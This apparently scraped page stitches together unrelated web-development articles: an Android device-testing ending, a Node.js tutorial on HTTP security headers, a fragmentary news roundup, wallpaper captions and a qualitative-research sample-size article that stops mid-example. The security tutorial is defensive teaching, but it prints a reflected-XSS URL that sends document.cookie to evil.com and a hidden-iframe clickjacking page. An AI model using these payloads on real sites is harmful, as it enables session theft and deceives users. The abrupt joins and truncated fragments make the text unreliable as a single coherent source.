The launched agent must connect to your server (such as Bamboo or Jenkins), from which you can give it commands to perform the automated tests.
When your container is ready, all you need to do is connect it to your integration system. Each of these systems has extensive documentation and plenty of usage examples:
As soon as you connect your container according to the instructions, you will be able to execute code, launch your tests and work with your container via your integration system.
Sooner or later, physical mobile devices will appear in the integration system of every relatively large Android project. The need to fix mistakes, perform non-standard test cases and simply test for the presence of certain features all inevitably require an actual device. In addition, the devices won’t use your server resources, because they have their own processors and memory. Thus, the host for the phones doesn’t have to be super-powerful; any home desktop would handle this load nicely.
Consider the advantages and see what would be best for you — your automated testing system almost certainly has room for physical devices. Real devices have both advantages and disadvantages, so it would be great if you could share your opinion and expertise and tell us which you prefer to use: real devices or virtual machines. Looking forward to your comments! I wish you all fewer bugs and more test coverage!
(rb, yk, al, il)
Web applications, be they thin websites or thick single-page apps, are notorious targets for cyber-attacks. In 2016, approximately 40% of data breaches originated from attacks on web apps — the leading attack pattern. Indeed, these days, understanding cyber-security is not a luxury but rather a necessity for web developers, especially for developers who build consumer-facing applications.
HTTP response headers can be leveraged to tighten up the security of web apps, typically just by adding a few lines of code. In this article, we’ll show how web developers can use HTTP headers to build secure apps. While the code examples are for Node.js, setting HTTP response headers is supported across all major server-side-rendering platforms and is typically simple to set up.
Technically, HTTP headers are simply fields, encoded in clear text, that are part of the HTTP request and response message header. They are designed to enable both the HTTP client and server to send and receive meta data about the connection to be established, the resource being requested, as well as the returned resource itself.
Plain-text HTTP response headers can be examined easily using cURL, with the --head option, like so:
$ curl --head https://www.google.com
HTTP/1.1 200 OK
Date: Thu, 05 Jan 2017 08:20:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Accept-Ranges: none
Vary: Accept-Encoding
…
Today, hundreds of headers are used by web apps, some standardized by the Internet Engineering Task Force (IETF), the open organization that is behind many of the standards that power the web as we know it today, and some proprietary. HTTP headers provide a flexible and extensible mechanism that enables the rich and varying use cases found on the web today.
Caching is a valuable and effective technique for optimizing performance in client-server architectures, and HTTP, which leverages caching extensively, is no exception. However, in cases where the cached resource is confidential, caching can lead to vulnerabilities — and must be avoided. As an example, consider a web app that renders and caches a page with sensitive information and is being used on a shared PC. Anyone can view confidential information rendered by that web app simply by visiting the browser’s cache, or sometimes even as easily as clicking the browser’s “back” button!
The IETF’s RFC 7234, which defines HTTP caching, specifies the default behavior of HTTP clients, both browsers and intermediary Internet proxies, to always cache responses to HTTP GET requests — unless specified otherwise. While this enables HTTP to boost performance and reduce network congestion, it could also expose end users to theft of personal information, as mentioned above. The good news is that the HTTP specification also defines a pretty simple way to instruct clients not to cache a given response, through the use of — you guessed it! — HTTP response headers.
There are three headers to return when you are returning sensitive information and would like to disable caching by HTTP clients:
- Cache-Control: no-cache, no-store, must-revalidate. These three directives instruct clients and intermediary proxies not to use a previously cached response, not to store the response, and, even if the response is somehow cached, to revalidate the cache on the origin server.
- Pragma: no-cache. Older HTTP/1.0 clients do not process the Cache-Control header mentioned above. Use Pragma: no-cache to ensure that these older clients do not cache your response.
- Expires: -1. This header specifies a timestamp after which the response is to be considered stale. By specifying -1, instead of an actual future time, you ensure that clients immediately treat the response as stale and avoid caching it.

Note that, while disabling caching enhances the security of your web app and helps to protect confidential information, it does come at the price of a performance hit. Make sure to disable caching only for resources that actually require confidentiality, not for every response rendered by your server! For a deeper dive into best practices for caching web resources, I highly recommend reading Jake Archibald’s post on the subject.
Here’s how you would program these headers in Node.js:
function requestHandler(req, res) {
  res.setHeader('Cache-Control', 'no-cache, no-store, max-age=0, must-revalidate');
  res.setHeader('Pragma', 'no-cache');
  res.setHeader('Expires', '-1');
}
Today, the importance of HTTPS is widely recognized by the tech community. More and more web apps configure secured endpoints and are redirecting unsecure traffic to secured endpoints (i.e. HTTP to HTTPS redirects). Unfortunately, end users have yet to fully comprehend the importance of HTTPS, and this lack of comprehension exposes them to various man-in-the-middle (MitM) attacks. The typical user navigates to a web app without paying much attention to the protocol being used, be it secure (HTTPS) or unsecure (HTTP). Moreover, many users will just click past browser warnings when their browser presents a certificate error or warning!
The importance of interacting with web apps over a valid HTTPS connection cannot be overstated: An unsecure connection exposes the user to various attacks, which could lead to cookie theft or worse. As an example, it is not very difficult for an attacker to spoof network frames within a public Wi-Fi network and to extract the session cookies of users who are not using HTTPS. To make things even worse, even users interacting with a web app over a secured connection may be exposed to downgrade attacks, which try to force the connection to be downgraded to an unsecure connection, thus exposing the user to MitM attacks.
How can we help users avoid these attacks and better enforce the usage of HTTPS? Enter the HTTP Strict Transport Security (HSTS) header. Put simply, HSTS makes sure all communications with the origin host are using HTTPS. Specified in RFC 6797, HSTS enables a web app to instruct browsers to allow only HTTPS connections to the origin host, to internally redirect all unsecure traffic to secured connections, and to automatically upgrade all unsecure resource requests to be secure.
HSTS directives include the following:
- max-age=<number of seconds>: instructs the browser to enforce an HTTPS-only policy for the origin host for the specified number of seconds.
- includeSubDomains: applies the policy to all of the host’s subdomains as well.
- preload: signals that the domain may be included in the browsers’ built-in HSTS preload list, so that even a user’s very first visit is forced over HTTPS. (You must also register your domain on the preload list for this to take effect.)

A word of caution: using the preload directive also means it cannot be easily undone, and carries an update lead time of months! While preload certainly improves your app’s security, it also means you need to be fully confident your app can support HTTPS-only!
My recommendation is to use Strict-Transport-Security: max-age=31536000; includeSubDomains; which instructs the browser to enforce a valid HTTPS connection to the origin host and to all subdomains for a year. If you are confident that your app can handle HTTPS-only, I would also recommend adding the preload directive, in which case don’t forget to register your website on the preload list as well, as noted above!
Here’s what implementing HSTS looks like in Node.js:
function requestHandler(req, res) {
  res.setHeader('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
}
In a reflected cross-site scripting attack (reflected XSS), an attacker injects malicious JavaScript code into an HTTP request, with the injected code “reflected” in the response and executed by the browser rendering the response, enabling the malicious code to operate within a trusted context, accessing potentially confidential information such as session cookies. Unfortunately, XSS is a pretty common web app attack, and a surprisingly effective one!
To understand a reflected XSS attack, consider the Node.js code below, rendering mywebapp.com, a mock and intentionally simple web app that renders search results alongside the search term requested by the user:
function handleRequest(req, res) {
  res.writeHead(200);

  // Get the search term
  const parsedUrl = require('url').parse(req.url);
  const searchTerm = decodeURI(parsedUrl.query);
  const resultSet = search(searchTerm);

  // Render the document
  res.end(
    "<html>" +
    "<body>" +
    "<p>You searched for: " + searchTerm + "</p>" +
    // Search results rendering goes here…
    "</body>" +
    "</html>");
}
Now, consider how the web app above will handle a URL constructed with malicious executable code embedded within the URL, such as this:
https://mywebapp.com/search?</p><script>window.location="http://evil.com?cookie="+document.cookie</script>
As you may realize, this URL will make the browser run the injected script and send the user’s cookies, potentially including confidential session cookies, to evil.com!
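One common mitigation, complementary to the headers discussed below, is to HTML-escape untrusted input before echoing it into the response. Here is a minimal sketch; the escapeHtml helper is illustrative, not part of the original code:

```javascript
// Illustrative helper: encode the five significant HTML characters so that
// injected markup is rendered as inert text instead of being executed.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// In the handler above, the search term would then be rendered safely:
// "<p>You searched for: " + escapeHtml(searchTerm) + "</p>"
```

With output escaped this way, the injected script tag arrives in the page as literal text and never runs.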
To help protect users against reflective XSS attacks, some browsers have implemented protection mechanisms. These mechanisms try to identify these attacks by looking for matching code patterns in the HTTP request and response. Internet Explorer was the first browser to introduce such a mechanism with its XSS filter, introduced in Internet Explorer 8 back in 2008, and WebKit later introduced XSS Auditor, available today in Chrome and Safari. (Firefox has no similar mechanism built in, but users can use add-ons to gain this functionality.) These various protection mechanisms are not perfect: They may fail to detect a real XSS attack (a false negative), and in other cases may block legitimate code (a false positive). Due to the latter, browsers allow users to disable the XSS filter via the settings. Unfortunately, this is typically a global setting, which turns off this security feature completely for all web apps loaded by the browser.
Luckily, there is a way for a web app to override this configuration and ensure that the XSS filter is turned on for the web app being loaded by the browser. This is done via the X-XSS-Protection header. This header, supported by Internet Explorer (from version 8), Edge, Chrome and Safari, instructs the browser to turn on or off the browser’s built-in protection mechanism and to override the browser’s local configuration.
X-XSS-Protection directives include these:
- 1 or 0: enables or disables the browser’s XSS filter for the page, overriding the user’s local configuration.
- mode=block: instructs the browser to block rendering of the entire page when an attack is detected, rather than attempting to sanitize the injected code.

I recommend always turning on the XSS filter, as well as block mode, to maximize user protection. Such a response header looks like this:
X-XSS-Protection: 1; mode=block
Here’s how you would configure this response header in Node.js:
function requestHandler(req, res) {
  res.setHeader('X-XSS-Protection', '1; mode=block');
}
An iframe (or HTML inline frame element, if you want to be more formal) is a DOM element that allows a web app to be nested within a parent web app. This powerful element enables some important web use cases, such as embedding third-party content into web apps, but it also has significant drawbacks, such as not being SEO-friendly and not playing nice with browser navigation — the list goes on.
One of the caveats of iframes is that it makes clickjacking easier. Clickjacking is an attack that tricks the user into clicking something different than what they think they’re clicking. To understand a simple implementation of clickjacking, consider the HTML markup below, which tries to trick the user into buying a toaster when they think they are clicking to win a prize!
<html>
  <body>
    <button class='some-class'>Win a Prize!</button>
    <iframe class='some-class' style='opacity: 0;' src='http://buy.com?buy=toaster'></iframe>
  </body>
</html>
Clickjacking has many malicious applications, such as tricking the user into confirming a Facebook like, purchasing an item online and even submitting confidential information. Malicious web apps can leverage iframes for clickjacking by embedding a legitimate web app inside their malicious web app, rendering the iframe invisible with the opacity: 0 CSS rule, and placing the iframe’s click target directly on top of an innocent-looking button rendered by the malicious web app. A user who clicks the innocent-looking button will trigger a click on the embedded web app — without at all knowing the effect of their click.
An effective way to block this attack is by restricting your web app from being framed. X-Frame-Options, specified in RFC 7034, is designed to do exactly that! This header instructs the browser to apply limitations on whether your web app can be embedded within another web page, thus blocking a malicious web page from tricking users into invoking various transactions on your web app. You can either block framing completely using the DENY directive, whitelist specific domains using the ALLOW-FROM directive, or whitelist only the web app’s origin using the SAMEORIGIN directive.
My recommendation is to use the SAMEORIGIN directive, which enables iframes to be leveraged for apps on the same domain — which may be useful at times — and which maintains security. This recommended header looks like this:
X-Frame-Options: SAMEORIGIN
Here’s an example of a configuration of this header to enable framing on the same origin in Node.js:
function requestHandler(req, res) {
  res.setHeader('X-Frame-Options', 'SAMEORIGIN');
}
As we’ve noted earlier, you can add in-depth security to your web app by enabling the browser’s XSS filter. However, note that this mechanism is limited, is not supported by all browsers (Firefox, for instance, does not have an XSS filter) and relies on pattern-matching techniques that can be tricked.
Another layer of in-depth protection against XSS and other attacks can be achieved by explicitly whitelisting trusted sources and operations — which is what Content Security Policy (CSP) enables web app developers to do.
CSP is a W3C specification that defines a powerful browser-based security mechanism, enabling granular control over resource-loading and script execution in a web app. With CSP, you can whitelist specific domains for operations such as script-loading, AJAX calls, image-loading and style sheet-loading. You can enable or disable inline scripts or dynamic scripts (the notorious eval) and control framing by whitelisting specific domains for framing. Another cool feature of CSP is that it allows you to configure a real-time reporting target, so that you can monitor your app in real time for CSP blocking operations.
This explicit whitelisting of resource loading and execution provides in-depth security that in many cases will fend off attacks. For example, by using CSP to disallow inline scripts, you can fend off many of the reflective XSS attack variants that rely on injecting inline scripts into the DOM.
CSP is a relatively complex header, with a lot of directives, and I won’t go into the details of the various directives. HTML5 Rocks has a great tutorial that provides an overview of CSP, and I highly recommend reading it and learning how to use CSP in your web app.
Here’s a simple example of a CSP configuration to allow script-loading from the app’s origin only and to block dynamic script execution (eval) and inline scripts (as usual, on Node.js):
function requestHandler(req, res) {
  res.setHeader('Content-Security-Policy', "script-src 'self'");
}
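If you want to trial a policy before enforcing it, CSP’s report-only mode sends violation reports without blocking anything. The sketch below uses the standard Content-Security-Policy-Report-Only header with a report-uri directive; the /csp-report endpoint is an assumption, and you would implement it separately to log incoming reports:

```javascript
function requestHandler(req, res) {
  // Report-only mode: violations are reported, not blocked, which is
  // useful while tuning a policy against real traffic.
  // The /csp-report path is hypothetical; point it at your own logging endpoint.
  res.setHeader(
    'Content-Security-Policy-Report-Only',
    "script-src 'self'; report-uri /csp-report"
  );
}
```

Once the reports show no false positives, the same policy can be moved to the enforcing Content-Security-Policy header.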
In an effort to make the user experience as seamless as possible, many browsers have implemented a feature called content-type sniffing, or MIME sniffing. This feature enables the browser to detect the type of a resource provided as part of an HTTP response by “sniffing” the actual resource bits, regardless of the resource type declared through the Content-Type response header. While this feature is indeed useful in some cases, it introduces a vulnerability and an attack vector known as a MIME confusion attack. A MIME-sniffing vulnerability enables an attacker to inject a malicious resource, such as a malicious executable script, masquerading as an innocent resource, such as an image. With MIME sniffing, the browser will ignore the declared image content type, and instead of rendering an image will execute the malicious script.
Luckily, the X-Content-Type-Options response header mitigates this vulnerability! This header, introduced in Internet Explorer 8 back in 2008 and currently supported by most major browsers (Safari is the only major browser not to support it), instructs the browser not to use sniffing when handling fetched resources. Because X-Content-Type-Options was only formally specified as part of the “Fetch” specification, the actual implementation varies across browsers; some (Internet Explorer and Edge) completely avoid MIME sniffing, whereas others (Firefox) still MIME sniff but block executable resources (JavaScript and CSS) when an inconsistency between declared and actual types is detected. The latter is in line with the latest Fetch specification.
X-Content-Type-Options is a simple response header, with only one directive: nosniff. This header looks like this: X-Content-Type-Options: nosniff. Here’s an example of a configuration of the header:
function requestHandler(req, res) {
  res.setHeader('X-Content-Type-Options', 'nosniff');
}
In this article, we have seen how to leverage HTTP headers to reinforce the security of your web app, to fend off attacks and to mitigate vulnerabilities.
- Disable caching of confidential information using the Cache-Control header.
- Enforce HTTPS using the Strict-Transport-Security header, and add your domain to Chrome’s preload list.
- Enable the browser’s XSS filter using the X-XSS-Protection header.
- Block clickjacking by restricting framing with the X-Frame-Options header.
- Use Content-Security-Policy to whitelist specific sources and endpoints.
- Disable MIME sniffing using the X-Content-Type-Options header.

Remember that for the web to be truly awesome and engaging, it has to be secure. Leverage HTTP headers to build a more secure web!
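The recommendations covered in this article all fit in a single handler. The sketch below is one way to combine them; in practice, a middleware library such as Helmet for Express bundles these same headers, and remember that the cache-disabling headers belong only on confidential responses:

```javascript
function secureHeaders(req, res) {
  // Disable caching (apply only to responses carrying confidential data).
  res.setHeader('Cache-Control', 'no-cache, no-store, max-age=0, must-revalidate');
  res.setHeader('Pragma', 'no-cache');
  res.setHeader('Expires', '-1');
  // Enforce HTTPS for a year, including subdomains.
  res.setHeader('Strict-Transport-Security', 'max-age=31536000; includeSubDomains');
  // Turn on the browser's XSS filter in blocking mode.
  res.setHeader('X-XSS-Protection', '1; mode=block');
  // Allow framing only by pages from the same origin.
  res.setHeader('X-Frame-Options', 'SAMEORIGIN');
  // Whitelist script-loading from our own origin only.
  res.setHeader('Content-Security-Policy', "script-src 'self'");
  // Disable MIME sniffing.
  res.setHeader('X-Content-Type-Options', 'nosniff');
}
```

Calling secureHeaders(req, res) at the top of each request handler applies the whole set at once.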
(Disclaimer: The content of this post is my own and doesn’t represent my past or current employers in any way whatsoever.)
Front page image credits: Pexels.com.
(da, yk, al, il)
Iosevka is a slender monospace sans-serif and slab-serif typeface inspired by Pragmata Pro, M+ and PF DIN Mono, designed to be the ideal font for programming.
What a busy week! To stay on top of things, let’s review what happened in the web development world the last few days — from browser vendors pushing new updates and building new JavaScript guidelines and security standards to why we as web professionals need to review our professional pride. How can we properly revoke certificates in browsers, for example? And how can we build accessibility into a style guide? Let’s take a look.
- …fetch(), IndexedDB 2.0, Custom Elements, Form Validation, Media Capture, and much more. You can read more about the new features and how to use them in detail on the WebKit blog.
- …alert(), confirm(), and prompt() methods in JavaScript anymore, and, in the future, they might even deprecate sites that still use them. The suggestion is to use the Web Notification API instead, in the hope that its asynchronous nature will prevent it from being misused against users. As a nice side effect, using the API will also speed up browser performance significantly.
And with that, I’ll close for this week. If you like what I write each week, please support me with a donation or share this resource with other people. You can learn more about the costs of the project here. It’s available via email, RSS and online.
— Anselm
“Prank your friends with caution.” — Designed by foodpanda Singapore from Singapore.
“I believe that Earth is something that we take for granted. We need to start taking care of our home, after all if the Earth is not OK, we won’t be.” — Designed by Maria Keller from Mexico.
“I designed this wallpaper combining both the sunny and the rainy weather. April, here in Italy, is synonymous with flowers and fun, and we can enjoy the first hot days after winter; but it’s also damn rainy! So I just brought all together and made my ‘Funshower’, a funny pun!” — Designed by Stefano Marchini from Italy.
“April the 2nd is Hans Christian Andersen’s birthday. Hans is most famous for his magical fairy tales, such as ‘The Little Mermaid’, ‘The Princess and the Pea’ and ‘Thumbelina’. I always loved the tale of Thumbelina, so I created this wallpaper for Hans!” — Designed by Safia Begum from the United Kingdom.
“Design is a community. Each one of these creators found their way into my consciousness as idea-catalysts. This is my way of thanking them and so I’m excited to bring this set to the greater design community. However these are used, my aim is to pay tribute to these sixteen and drive baby-steppers to great inspirers.” — Designed by Juliane Bone from California.
“Every year, Washington DC’s Kite Festival is a welcome sight in spring. The National Mall is transformed by colorful serpents, butterflies, and homemade winged crafts and by the families who come from across the city to enjoy their aerial stunts over a picnic at the base of the Washington Monument.” — Designed by The Hannon Group from Washington, DC.
“The most beautiful flowers are in bloom around my neighborhood, and I get this little tune stuck in my head every time I go for a walk. I thought it would be perfect for a bright watercolor-styled design!” — Designed by Alyson Sherrard from Pensacola, Florida.
“This bad bunny is just waiting for Easter. :)” — Designed by Izabela from Poland.
“Sometimes when you are out and about you see something that captures your attention. It does not have to be anything spectacular, but you know that you want to remember it at that specific point in time. No matter how busy you are, stop and see the flowers.” — Designed by Kris G from the USA.
“‘When all the world appears to be in a tumult, and nature itself is feeling the assault of climate change, the seasons retain their essential rhythm. Yes, fall gives us a premonition of winter, but then, winter, will be forced to relent, once again, to the new beginnings of soft greens, longer light, and the sweet air of spring.’ (Madeleine M. Kunin)” — Designed by Dipanjan Karmakar from India.
“My calendar is an illustration of the old proverb ‘April showers bring May flowers’. I always look forward to the end of that transition.” — Designed by Caitey Kennedy from the United States.
“A smiling earth is how I wish to think of my home planet. I like to believe that whenever a plantling gets its root deep into the soil, or when a dolphin jumps out of the water, the earth must be getting tickled, bringing a wide grin on its face. So this World Earth Day, let’s promote afforestation, protect the wildlife and its habitat. Let’s make the earth smile forever.” — Designed by Acodez IT Solutions from India.
“When I think of spring, I think of little chickens playing in the field. They always look so happy. I just bought 3 new little chickens, and they are super cute. So enjoy this wallpaper, and enjoy spring.” — Designed by Melissa Bogemans from Belgium.
“Spring revives nature, so I designed a wallpaper with a cute little fairy who awakens plants.” — Designed by Hushlenko Antonina from Ukraine.
“April showers bring May flowers, and what better way to enjoy rainy weather than to get stuck in a surreal book, in a comfy nook, with a kettle of tea!” — Designed by Brooke Coraldi from the United States.
“It is time for more colour in our life! After this cold and dark winter, we have to paint our minds or better our walls. Flower power everywhere!” — Designed by Sabrina Lobien from Germany.
Designed by Doud – Elise Vanoorbeek from Belgium.
“April is magical. April is musical. April is mesmerizing. April is the International Month of Guitar. Let this calendar make it special.” — Designed by ColorMean Creative Studio from Dubai, United Arab Emirates.
“Spring is a great time to photograph nature because everything is green and full of new life. Like spring, a sunrise is also the start of something new.” — Designed by Marc Andre from the United States.
Please note that we respect and carefully consider the ideas and motivation behind each and every artist’s work. This is why we give all artists the full freedom to explore their creativity and express emotions and experience through their works. This is also why the themes of the wallpapers were not influenced by us in any way, but rather designed from scratch by the artists themselves.
A big thank you to all designers for their participation. Join in next month!
What’s your favorite theme or wallpaper for this month? Please let us know in the comment section below.
Jen is presenting her research report to a client, who runs an e-commerce website. She conducted interviews with 12 potential users. Her goal was to understand the conditions under which users choose to shop online versus in store. The client asks Jen why they should trust her research when she has spoken to only 12 people. Jen explains her process to the client. She shares how she determined the sample size and collected and analyzed her data through the lens of data saturation. The client feels comfortable with the explanation. She asks Jen to continue the presentation.
Researchers must justify the sample size of their studies. Clients, colleagues and investors want to know they can trust a study’s recommendations. They base a lot of trust on sample population and size. Did you talk to the right people? Did you talk to the right number of people? Researchers must also know how to make the most of the data they collect. Your sample size won’t matter if you haven’t asked good questions and done thorough analysis.
Quantitative research methods (such as surveys) come with effective statistical techniques for determining a sample size. This is based on the population size you are studying and the level of confidence desired in the results. Many stakeholders are familiar with quantitative methods and terms such as “statistical significance.” These stakeholders tend to carry this understanding across all research projects and are, therefore, expecting to hear similar terms and hear of similar sample sizes across research projects.
Qualitative researchers need to set the context for stakeholders. Qualitative research methods (such as interviews) currently have no similar commonly accepted technique. Yet, there are steps you should take to ensure you have collected and analyzed the right amount of data.
In this article, I will propose a formula for determining qualitative sample sizes in user research. I’ll also discuss how to collect and analyze data in order to achieve “data saturation.” Finally, I will provide a case study highlighting the concepts explored in this article.
As researchers, or members of teams that work with researchers, we need to understand and convey to others why we’ve chosen a particular sample size.
I’ll give you the bad news first. We don’t have an agreed-upon formula to determine an exact sample size for qualitative research. Anyone who says otherwise is wrong. We do have some suggested guidelines based on precedent in academic studies. We often use smaller sample sizes for qualitative research. I have been in projects that include interviews with fewer than 10 people. I have also been in projects in which we’ve interviewed dozens of people. Jakob Nielsen suggests a sample size of five for usability testing. However, he adds a number of qualifiers, and the suggestion is limited to usability testing studies, not exploratory interviews, contextual inquiry or other qualitative methods commonly used in the generative stages of research.
So, how do we determine a qualitative sample size? We need to understand the purpose of our research. We conduct qualitative research to gain a deep understanding of something (an event, issue, problem or solution). This is different from quantitative research, whose purpose is to quantify, or measure the presence of, something. Quantification usually provides a shallow yet broad view of an issue.
You can determine your qualitative research sample size on a rolling basis. Or you can state the sample size up front.
If you are an academic researcher in a multi-year project, or you have a large budget and generous timeline, you can suggest a rolling sample size. You’d collect data from a set number of participants. At the same time, you’d analyze the data and determine whether you need to collect more data. This approach leads to large amounts of data and greater certainty in your findings. You will have a deep and broad view of the issue that you are designing to address. You would stop collecting data because you have exhausted the need to continue collecting data. You will likely end up with a larger sample size.
Most clients or projects require you to state a predetermined sample size. Reality, in the form of budget and time, often dictates sample sizes. You won’t have time to interview 50 people and do a thorough analysis of the data if your project is expected to move from research to design to development over an 8- to 10-week period. A sample size of 10 to 12 is probably more realistic for a project like this. You will probably have two weeks to get from recruitment to analysis. You would stop because you have exhausted the resources for your study. Yet our clients and peers want us to make impactful recommendations from this data.
Your use of a rolling or predetermined sample size will determine how you speak about why you stopped collecting data. For a rolling sample, you could say, “We stopped collecting data after analysis found it would no longer prove valuable to collect more data.” If you use a predetermined sample size, you could say, “We stopped collecting data after we interviewed (or observed, etc.) the predetermined number we agreed upon. We fully analyzed the data collected.”
We can still maintain a rigorous process using a predetermined sample size. Our findings are still valid. Data saturation helps to ensure this. You need to complete three steps in order to claim you’ve done due diligence in determining a sample size and reaching data saturation when using a predetermined sample:
I will cover each step in detail in the following sections.
Donna Bonde from Research by Design, a marketing research firm, provides research-based guidelines (“Qualitative market research: When enough is enough”) to help determine the size of a qualitative research sample up front. Bonde reviewed the work of numerous market research studies to determine the consistent key factors for sample sizes across the studies. Bonde considers the guidelines not to be a formula, but rather to be factors affecting qualitative sample sizes. The guidelines are meant for marketing research, so I’ve modified them to suit the needs of the user researcher. I have also organized the relevant factors into a formula. This will help you to determine and justify a sample size and to increase the likelihood of reaching saturation.
The formula for determining a sample size, based on my interpretation of Research by Design’s guidelines, is: scope × characteristics ÷ expertise + or - resources.
Here are descriptions and examples for the four factors of the formula for determining your qualitative sample size.
You need to consider what you are trying to accomplish. This is the most important factor when considering sample size. Are you looking to design a solution from scratch? Or are you looking to identify small wins to improve your current product’s usability? You would maximize the number of research participants if you were looking to inform the creation of a new experience. You could include fewer participants if you are trying to identify potential difficulties in the checkout workflow of your application.
Numerically, the scope can be anywhere from 1 to infinity. A zero would designate no research, which violates principles of UX design. You will multiply the scope by each user type × 3 in the next step. So, including a number greater than 1 will drastically increase your sample size. Scope is all about how you want to apply your results. I recommend using the following values for filling in scope:
I’ve given you guidelines for scope that will make sure your sample size is comparable to what some academic researchers suggest. Scholar John Creswell suggests guidelines ranging from as few as five for a case study (for example, your existing product) to more than 20 for developing a new theory (for example, generalizing beyond your product). We won’t stop with Creswell’s recommendations because you will create a stronger argument and demonstrate better understanding when you show that you’ve used a formula to determine your sample size. Also, as Creswell suggests, scholars are nowhere near agreement on specific sample sizes to use.
You will increase your sample size as the diversity of your population increases. You will want multiple representatives of each persona or user type you are designing for. I recommend a minimum of three participants per user type. This allows for a deeper exploration of the experience each user type might have.
Let’s say you are designing an application that enables manufacturing companies to input and track the ordering and shipment of supplies from warehouses to factories. You would want to interview many people involved in this process: warehouse floor workers, office staff, procurement staff from the warehouse and factory, managers and more. If you were looking only to redesign the interface of the read-only tracking function of this app, then you might only need to interview people who look at the tracking page of the application: warehouse and factory office workers.
Numerically, C = P × 3, where P equals the number of unique user types you’ve identified. Three user types would give you C = 9.
Experienced researchers can do more with a smaller sample size than less experienced researchers. Qualitative researchers insert themselves into the data-collection process differently than quantitative researchers. You can’t change your line of questioning in a survey based on an unforeseen topic becoming relevant. You can adjust your line of questioning based on the real-time feedback you get from a qualitative research participant. Experienced researchers will generate more and better-quality data from each participant. An experienced researcher knows how and when to dig deeper based on a participant’s response. An experienced researcher will bring a history of experiences to add insight to the data analysis.
Numerically, expertise (E) could range from 1 to infinity. Realistically, the range should be from 1 to 2. For example, a researcher with no experience should have a 1 because they will need the full size of the sample, and they would gain experience as the project moves forward. Using a 2 would halve your sample size (at that point in the formula), which is drastic as well. I’d suggest adding tenths (.10) based on 5-year increments; for example, a researcher with 5 years of experience would give you E = 1.10.
It’s an unfortunate truth: you will have to account for budget and time constraints when determining a sample size. As you increase the size of your sample, you will need to increase either your timeline or the number of researchers on the project. Most clients or projects will require you to identify a set number of research participants, and time and money will affect this number. You will need to budget time for recruiting participants and analyzing data, and you will also need to consider what design and development need in order to complete their duties. Peers will not value your research findings if the findings come in after everyone else has moved forward. I recommend scaling down a sample size to get the data on time, rather than holding on to a sample size that causes your research to drag on past the point when your team needs the findings.
Numerically, resources (R) act as an adjustment to the desired sample size: a negative number (−1 or more) when resources are tight, or a positive number (+1 or more) when you have room to spare. You’ll determine resources based on the cost and time you will spend recruiting participants, conducting research and analyzing data. You might have specific numbers based on previous efforts. For example, you might know it will cost around $15,000 to use a recruitment service, to rent a facility for two days and to pay 15 participants for one-hour interviews. You also know the recruiting service will ask for up to three weeks to find the sample you need, depending on the complexity of the study. On the other hand, you might be able to recruit 15 participants at no extra cost if you ask your client to find existing users, but that might add weeks to the process if you can’t find them quickly or if potential participants aren’t immediately available.
You will need to budget for the time and resources necessary to get the sample you require, or you will need to reduce your sample accordingly. Because this is a fact of life, I recommend being up front about it. Say to your boss or client, “We want to speak to 15 users for this project. But our budget and timeline will only allow for 10. Please keep that in mind when we present our findings.”
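Taken together, the four variables combine into the formula ((S × C) ÷ E) + R. As a minimal sketch (a hypothetical helper, not part of any published toolkit):

```python
import math

def sample_size(s: int, c: int, e: float, r: int) -> int:
    """Proposed sample size: ((S x C) / E) + R, rounded up to a whole
    participant. Rounding the float first sidesteps floating-point
    noise (e.g. 18 / 1.2 evaluates to slightly more than 15)."""
    return math.ceil(round((s * c) / e + r, 6))

# e.g. a large-scope study (S = 2) with three user types (C = 9),
# an experienced researcher (E = 1.20) and no resource adjustment (R = 0):
print(sample_size(2, 9, 1.20, 0))  # → 15
```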
Let’s say you want to figure out how many participants to include in a study that is assessing the need to create an area for customer-service staff members of a mid-sized client to access the applications they use at work (a portal). Your client states that there are three basic user types: floor staff, managers and administrators. You have a healthy budget and a total of 10 weeks to go from research to presentation of design concepts for the portal and a working prototype of a few workflows within the portal. You have been a researcher for 11 years.
Your formula for determining a sample size would be:
- Scope (S): large scope, creating a new portal → S = 2
- Characteristics (C): 3 user types → C = 9
- Expertise (E): 11 years → E = 1.20
- Resources (R): fine for this study → R = 0
- Our formula is ((S × C) ÷ E) + R
- ((2 × 9) ÷ 1.2) + 0 = 15 participants for this study

Data saturation is a concept from academic research. Academics do not agree on the definition of saturation, but the basic idea is to get enough data to support the decisions you make, and to exhaust your analysis of that data. You need enough data to create meaningful themes and recommendations from that exhaustive analysis. Reaching data saturation depends on the particular methods you are using to collect data. Interviews are often cited as the best method to ensure you reach data saturation.
Researchers do not often use sample size alone as the criterion for assessing saturation. I support a two-pronged definition: saturation of data collection and saturation of data analysis. You need to do both to achieve data saturation in a study. You also need to do both, data collection and analysis, simultaneously to know you’ve achieved saturation before the study concludes.
You would collect enough meaningful data to identify key themes and make recommendations. Once you have coded your data and identified key themes, do you have actionable takeaways? If so, you should feel comfortable with what you have. If you haven’t identified meaningful themes or if the participants have all had many different experiences, then collect additional data. Or if something unique came up in only one interview, you might add more focused interviews to further explore that concept.
You would achieve saturation of data collection in part by collecting rich data. Rich data is data that provides a depth of insight into the problem you are investigating. Rich data is an output of good questions, good follow-up prompts and an experienced researcher. You would collect rich data based on the quality of the data collection, not the sample size. It’s possible to get better information from a sample of three people whom you spend an hour each interviewing than you would from six people whom you only spend 30 minutes interviewing. You need to hone your questions in order to collect rich data. You would accomplish this when you create a questionnaire and iterate based on feedback from others, as well as from practice runs prior to data collection.
You might want to limit your study to specific types of participants. This could reduce the need for a larger sample to reach saturation of data collection.
For example, let’s say you want to understand the situation of someone who has switched banks recently.
Have you identified key characteristics that might differentiate members of this group? Perhaps someone who recently moved and switched banks has had a drastically different experience than someone whose bank charged them too many fees and made them angry.
Have you talked to multiple people who fit each user type? Did their experiences suggest a commonality between the user types? Or do you need to look deeper at one or both user types?
If you interview only one person who fits the description of a user who has recently moved and switched banks, then you’d need to increase your sample and talk to more people of that user type. Perhaps you could make an argument that only one of these user types is relevant to your current project. This would allow you to focus on one of the user types and reduce the number of participants needed to reach saturation of data collection.
Let’s say you’ve determined that you’ll need a sample size of 15 people for your banking study.
